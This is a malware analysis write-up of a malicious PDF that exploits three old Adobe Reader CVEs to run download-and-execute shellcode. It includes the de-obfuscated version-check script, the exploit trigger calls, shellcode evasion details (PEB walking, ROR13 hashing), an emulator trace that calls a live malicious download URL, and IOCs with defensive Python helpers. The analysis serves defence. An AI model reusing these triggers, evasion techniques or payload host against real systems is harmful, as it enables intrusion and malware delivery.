
Adobe PDF Exploit

In the malware landscape, PDF documents have long been one of the most popular attack vectors. Thanks to vulnerabilities in Adobe Reader and its plugins, a seemingly harmless file can become the entry point to compromise a system.

In this article, we will analyze a real malicious PDF that exploits different vulnerabilities depending on the version of the reader installed, and we’ll see how it integrates a very compact shellcode (104 bytes) to download and execute a remote payload.

Sample Identification and Initial Triage

The malicious file under analysis is a PDF version 1.3 with a size of just 17 KB. At first glance, it doesn’t include Flash objects or embedded multimedia, but we quickly identified several JavaScript streams hidden inside the document. These scripts are automatically triggered through the /OpenAction directive, ensuring that the malicious code executes as soon as the file is opened in Adobe Reader.

To fingerprint the sample, we calculated the following hashes:

  • MD5: 9e4938009e8d3b06442b727e73a7958c
  • SHA-1: 139ac50c3f7e2def20be4077a59941235e0098ff
  • SHA-256: 0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753
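
The digests above can be reproduced with any standard hashing tool. As a minimal sketch, the Python helper below computes all three in a single pass over the file; the function name file_hashes and the chunk size are illustrative choices, not part of the original analysis.

```python
import hashlib


def file_hashes(path, chunk_size=65536):
    """Return the MD5, SHA-1 and SHA-256 hex digests of a file."""
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with open(path, "rb") as handle:
        # Read in chunks so large samples do not have to fit in memory.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            for digest in digests.values():
                digest.update(chunk)
    return {name: digest.hexdigest() for name, digest in digests.items()}
```

Calling file_hashes on the sample and comparing the result with the list above is a quick way to confirm that the file being analyzed is the same one described here.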

A check in VirusTotal showed a high detection rate across multiple AV engines, confirming that the document was already flagged as malicious.

virustotal.png

The internal structure analysis using PDFStreamDumper revealed three suspicious JavaScript objects, clearly pointing to an intentional exploitation setup rather than a benign document.

pdfstreamdumper.png

Using the collected information, we can summarize the metadata extracted from the online sandbox:

| Field | Value |
| --- | --- |
| MD5 | 9e4938009e8d3b06442b727e73a7958c |
| SHA-1 | 139ac50c3f7e2def20be4077a59941235e0098ff |
| SHA-256 | 0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753 |
| Vhash | 92ed1bde3b4201a28f31eb183acad4fc8 |
| SSDEEP | 192:T0G2mJhASZy09x86Oly09x8Dvj5lRZly09x8SRZkjXmdfRZo5suB:THJPZy09x8Dly09x8/5hly09x8y1o5T |
| TLSH | T198726952AF9813A598604DF52349361724F2DE2F28D9319AE6D11E73B03EB13ECE9374 |
| File Type | PDF, document, pdf |
| Magic | PDF document, version 1.3, 0 pages |
| TrID | Adobe Portable Document Format (100 %) |
| File Size | 17.06 KB (17,467 bytes) |

The file is identified as a PDF document, version 1.3, with a total size of 17,467 bytes. No Flash objects or multimedia traces were observed, other than the three JavaScript streams. The object structure clearly indicates the deliberate use of /OpenAction in the root object, designed to trigger malicious code execution as soon as the PDF is opened.

Execution Flow of the Malicious PDF

The execution of the malware inside the PDF can be divided into several stages:

Phase 1 – Automatic Trigger

When the PDF is opened, the viewer processes the following entry in object 1:

/OpenAction << /JS (this.BXcfTYewQ()) /S /JavaScript >>

This directive ensures that the function BXcfTYewQ() is immediately executed in the Adobe Reader context.
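
A quick way to spot this kind of auto-run setup during triage is to count the relevant name objects in the raw file, similar in spirit to what keyword-counting triage tools do. The sketch below is a simplified illustration: the helper name count_pdf_keywords and the keyword list are assumptions, and it does not handle hex-escaped names or keywords hidden inside compressed streams.

```python
import re

# Name objects commonly associated with auto-executing script in a PDF
# (an illustrative selection, not an exhaustive list).
KEYWORDS = (b"/OpenAction", b"/AA", b"/JS", b"/JavaScript")


def count_pdf_keywords(data):
    """Count raw occurrences of each keyword in the PDF bytes."""
    counts = {}
    for keyword in KEYWORDS:
        # Reject a trailing name character so "/JS" does not match a longer name.
        pattern = re.escape(keyword) + rb"(?![A-Za-z0-9])"
        counts[keyword.decode("ascii")] = len(re.findall(pattern, data))
    return counts
```

A non-zero count for /OpenAction together with /JS or /JavaScript does not prove malice, but it is a reasonable signal that the document deserves a closer look.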

Phase 2 – Deobfuscation and Dynamic Definition

The actual definition of BXcfTYewQ is located in object 13, wrapped in two layers of eval and a large String.fromCharCode(...) block that reconstructs the full script at runtime.

jsdeobf1.png
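
The String.fromCharCode(...) layer can be peeled off statically, without running the sample's JavaScript. The following sketch assumes the arguments are plain decimal literals, as they appear to be in this sample; the name decode_charcodes is hypothetical, and nested layers would need the function applied again to its own output.

```python
import re

# Matches a call whose arguments are decimal literals separated by commas.
CHARCODE_CALL = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")


def decode_charcodes(script):
    """Return the text encoded by each String.fromCharCode(...) call."""
    decoded = []
    for match in CHARCODE_CALL.finditer(script):
        codes = [int(tok) for tok in match.group(1).split(",") if tok.strip()]
        decoded.append("".join(chr(code) for code in codes))
    return decoded
```

For instance, decode_charcodes("eval(String.fromCharCode(112, 100, 102))") yields a single string, "pdf".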

Once beautified with a tool like JS Beautifier, the code becomes more legible. We can then see that it dynamically defines:

  • Auxiliary functions (util_printf, collab_email, collab_geticon, pdf_start).
  • Shellcode injection via unescape() and preparation of a heap spray.

These functions contain the logic to exploit various Adobe Reader vulnerabilities (CVEs). The script ends by calling:

pdf_start();

jsbeautyfy.png

Phase 3 – PDF Reader Version Detection

Inside pdf_start(), the script retrieves the version of Adobe Reader:

function pdf_start() {
    var version = app.viewerVersion.toString();
    version = version.replace(/\D/g, '');
    var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));

    if ((varsion_array[0] == 8) && (varsion_array[1] == 0) ||
        (varsion_array[1] == 1 && varsion_array[2] < 3)) {
        util_printf();
    }

    if ((varsion_array[0] < 8) ||
        (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)) {
        collab_email();
    }

    if ((varsion_array[0] < 9) ||
        (varsion_array[0] == 9 && varsion_array[1] < 1)) {
        collab_geticon();
    }
}

For example, version “8.1.1” is reduced to the digit string “811”; the script then compares its first three digits individually, which lets it branch the attack depending on the environment.
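
To see which branches a given version reaches, the three conditions can be mirrored outside the reader. The sketch below is a Python transcription of the checks as printed above, not the author's tooling; the name exploits_for_version is hypothetical, and it assumes a missing digit behaves like 0, which matches how an empty string is coerced in JavaScript's loose comparisons.

```python
import re


def exploits_for_version(viewer_version):
    """Mirror the three independent checks in pdf_start() for a version string."""
    digits = re.sub(r"\D", "", str(viewer_version))
    # Assumption: a missing digit is treated as 0, like "" in loose JS comparisons.
    v = [int(digits[i]) if i < len(digits) else 0 for i in range(3)]

    fired = []
    # && binds tighter than ||, so the second clause does not test the major digit.
    if (v[0] == 8 and v[1] == 0) or (v[1] == 1 and v[2] < 3):
        fired.append("util_printf")
    if v[0] < 8 or (v[0] == 8 and v[1] < 2 and v[2] < 2):
        fired.append("collab_email")
    if v[0] < 9 or (v[0] == 9 and v[1] < 1):
        fired.append("collab_geticon")
    return fired
```

With this model, "8.1.1" satisfies all three checks, "7.0.9" reaches collab_email and collab_geticon, and "9.2.0" reaches none. Read literally, the first check also matches a string such as "9.1.0", because its second clause never looks at the major digit. In a real reader, a successful first exploit would presumably take control before the later checks run.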

Phase 4 – Selection of the Attack Vector

Depending on the detected version, up to three exploits are attempted. The checks in pdf_start() are separate if statements rather than an if/else chain, so a single version can match more than one of them:

  • Option A – util_printf() (CVE-2008-2992)
    Applicable to versions 8.0.0–8.1.2.
    A heap spray is prepared with 0x40000-byte blocks, each containing a NOP sled followed by the shellcode. The script then calls:

      util.printf("%45000f", num);

    The oversized format width overflows an internal buffer in util.printf, redirecting execution into the sprayed shellcode (RCE).

  • Option B – collab_email() (CVE-2007-5659)
    Attempted when the major version is below 8, or on 8.x builds whose second and third version digits are both below 2 (for example 8.0.1 or 8.1.1).
    It abuses:

      collab.collectEmailInfo({ subj:"", msg:overflow });

    The overflow occurs in the msg field, again redirecting execution to the same shellcode.

  • Option C – collab_geticon() (CVE-2009-0927)
    Attempted on any Adobe Reader older than 9.1; in practice it only matters if the earlier attempts have not already taken control.
    The exploit is triggered with:

      app.doc.Collab.getIcon(overflowString);

    In some cases, this results in fingerprinting or a DoS condition in vulnerable readers.

| Adobe Reader Version | Exploit Used | Expected Result |
| --- | --- | --- |
| 8.0.0 – 8.1.2 | util.printf() | Remote Code Execution |
| < 8.1.1 | collab_email() | Remote Code Execution |
| < 9.1 | collab_geticon() | Possible RCE / DoS |
| ≥ 9.1 | None | No effect |
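
For triage of similar samples, the three trigger calls can be turned into a simple lookup over deobfuscated JavaScript. This is a rough sketch under stated assumptions: the regular expressions and the name match_cves are illustrative, and a hit only means the call is present, since util.printf in particular is also a legitimate Acrobat API.

```python
import re

# Trigger calls and CVE identifiers as listed in this article.
SIGNATURES = {
    "CVE-2008-2992": re.compile(r"util\s*\.\s*printf\s*\(", re.IGNORECASE),
    "CVE-2007-5659": re.compile(r"collab\s*\.\s*collectEmailInfo\s*\(", re.IGNORECASE),
    "CVE-2009-0927": re.compile(r"collab\s*\.\s*getIcon\s*\(", re.IGNORECASE),
}


def match_cves(script):
    """Return the CVE ids whose trigger call appears in the script text."""
    return sorted(cve for cve, pattern in SIGNATURES.items() if pattern.search(script))
```

Running match_cves over the beautified script from this sample would be expected to report all three identifiers; on an unrelated document it helps decide which exploit path to examine first.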

Embedded Shellcode Analysis

The obfuscated JavaScript inside the PDF builds a heap spray that embeds the payload as sequences of %uXXXX. To extract it, we used a small Python script that:

  1. Reads the obfuscated JavaScript and finds all %uXXXX occurrences.
  2. For each XXXX, swaps the byte order (e.g., 0x1234 -> 34 12).
  3. Concatenates all results into a byte array.
  4. Saves the output into shellcode.bin.

shellcode_dump.png

As a result, we obtained a 104-byte binary.
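
The four steps listed above can be sketched in a few lines of Python. This is a reconstruction of the approach rather than the exact script used for the analysis; the name extract_shellcode is hypothetical, and the sketch collects every %uXXXX escape it finds, so any spray filler written in the same notation would have to be trimmed by hand.

```python
import re

UNICODE_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})")


def extract_shellcode(script):
    """Convert every %uXXXX escape into two bytes, low byte first."""
    out = bytearray()
    for match in UNICODE_ESCAPE.finditer(script):
        # %u1234 encodes the 16-bit value 0x1234, stored in memory as 34 12.
        out += int(match.group(1), 16).to_bytes(2, "little")
    return bytes(out)
```

Writing the returned bytes to shellcode.bin in binary mode gives a file that can be loaded directly into a disassembler or emulator.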

Static Analysis in IDA

Loading shellcode.bin into IDA reveals a compact but fully functional flow:

  • Dynamic API resolution – No direct imports; instead, the code walks the PEB to locate kernel32.dll, computes function name hashes from its Export Table, and compares them against precomputed values. urlmon.dll is then loaded with LoadLibraryA and resolved the same way.
  • Runtime string construction – Paths like %TEMP%\e.exe and the remote URL are assembled byte by byte using instructions such as stosb, stosw, and stosd.
  • Download & execution logic – After resolving URLDownloadToFileA and WinExec, the shellcode downloads the payload and executes it with SW_HIDE, finally calling ExitThread(0).

shellcode_analisis_main.png

Remarkably, the author fit all this functionality into only 104 bytes, implementing ROR13 hashing and avoiding static references to make AV detection more difficult.

PEB Walking and Function Hashing

The routine that resolves APIs begins by reading fs:[30h], the field of the Thread Environment Block (addressed through the FS segment register) that holds the PEB address. From there:

  1. It accesses PEB->Ldr.InInitializationOrderModuleList to iterate loaded modules.
  2. For each entry (LDR_DATA_TABLE_ENTRY), it retrieves the module name (e.g., kernel32.dll).
  3. It walks the Export Directory, extracts each function name, and computes a rolling ROR13 hash:

     hash = ROR(hash, 13) + character

    Example of resolved hashes:

| Function | Hash (hex) |
| --- | --- |
| GetTempPathA | 5B8ACA33 |
| LoadLibraryA | EC0E4E8E |
| URLDownloadToFileA | 702F1A36 |
| WinExec | 0E8AFE98 |
| ExitThread | 60E0CEEF |

  4. If the computed hash matches one hardcoded in the shellcode, the function pointer is retrieved.

shellcode_analisis_pebwalking.png
shellcode_analisis_pebwalking2.png

This technique keeps the shellcode independent of absolute addresses and avoids visible import tables.
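
The hashing step is easy to reproduce offline, which helps when labeling constants in a disassembly. The sketch below uses the common rotate-right-then-add form over the ASCII export name without its terminator, which reproduces the WinExec value in the table above; the function names ror32 and ror13_hash are illustrative.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name):
    """Hash an export name: rotate right by 13, then add the next character."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h
```

Hashing every export name of a DLL this way and storing the results in a dictionary keyed by hash gives a lookup table for the constants found in the shellcode.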

Controlled Execution with scDbg

To safely validate execution, we used scDbg with interactive hooks and memory monitoring. Running shellcode.bin at base address 0x401000 produced the following trace:

401086 GetTempPathA(len=88, buf=0x12fd80) = 25
4010B0 LoadLibraryA("urlmon.dll")
4010CA URLDownloadToFileA(
          "http://juvitec.net/css/load.php?e=2",
          "C:\\Users\\vboxuser\\AppData\\Local\\Temp\\e.exe",0,0)
4010D7 WinExec("C:\\Users\\vboxuser\\AppData\\Local\\Temp\\e.exe", SW_HIDE)
4010E0 ExitThread(0)

shellcode_sandbox.png

We also observed access to fs:[30h] and reads of the module list, confirming the same behavior described in the static analysis.
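
When comparing several samples, it can help to reduce a trace like this to its sequence of API calls. The sketch below assumes the line layout quoted above (a hex address, a space, then the API name and an opening parenthesis); real emulator output may differ between versions, and the name api_calls is hypothetical.

```python
import re

# Assumed layout: "<hex address> <ApiName>(" at the start of a line.
CALL_LINE = re.compile(r"^\s*([0-9A-Fa-f]{6,8})\s+([A-Za-z_]\w*)\(")


def api_calls(trace):
    """Return (address, api_name) for each call line in a trace."""
    calls = []
    for line in trace.splitlines():
        match = CALL_LINE.match(line)
        if match:
            # Continuation lines holding only arguments do not match and are skipped.
            calls.append((int(match.group(1), 16), match.group(2)))
    return calls
```

Applied to the trace above, this yields the five calls in order, from GetTempPathA to ExitThread, which is the typical signature of a download-and-execute stage.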

Indicators of Compromise (IOCs)

During the analysis, several artifacts were identified that can serve as Indicators of Compromise (IOCs). These help blue teams and incident responders detect whether this exploit or its payload has been executed in their environment.

| Type | Value |
| --- | --- |
| MD5 (PDF) | 9e4938009e8d3b06442b727e73a7958c |
| SHA-1 (PDF) | 139ac50c3f7e2def20be4077a59941235e0098ff |
| SHA-256 (PDF) | 0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753 |
| Malicious URL | hxxp://juvitec.net/css/load.php?e=2 |
| Dropped File | %TEMP%\e.exe |
| Exploit Techniques | CVE-2008-2992 (util.printf), CVE-2007-5659 (collab.collectEmailInfo), CVE-2009-0927 (collab.getIcon) |
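
As a rough illustration of how the network and file indicators might be applied, the sketch below scans text log lines for them. The log format, the helper names refang and find_ioc_hits, and the choice to match the file by its trailing "\e.exe" are all assumptions; the file match in particular is broad and would need tuning against real telemetry.

```python
# Indicators taken from the table above, lowercased for matching.
NETWORK_IOCS = ("juvitec.net/css/load.php",)
FILE_IOCS = ("\\e.exe",)  # Assumption: match any path ending in \e.exe


def refang(value):
    """Turn a defanged indicator such as hxxp://... back into its live form."""
    return value.replace("hxxp://", "http://").replace("[.]", ".")


def find_ioc_hits(lines):
    """Return the log lines that mention a network or file indicator."""
    hits = []
    for line in lines:
        lowered = refang(line).lower()
        if any(ioc in lowered for ioc in NETWORK_IOCS + FILE_IOCS):
            hits.append(line)
    return hits
```

Proxy logs would typically be checked against the network indicator and process-creation logs against the file indicator; hash indicators are better matched directly against file inventories.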
This post is licensed under CC BY 4.0 by the author.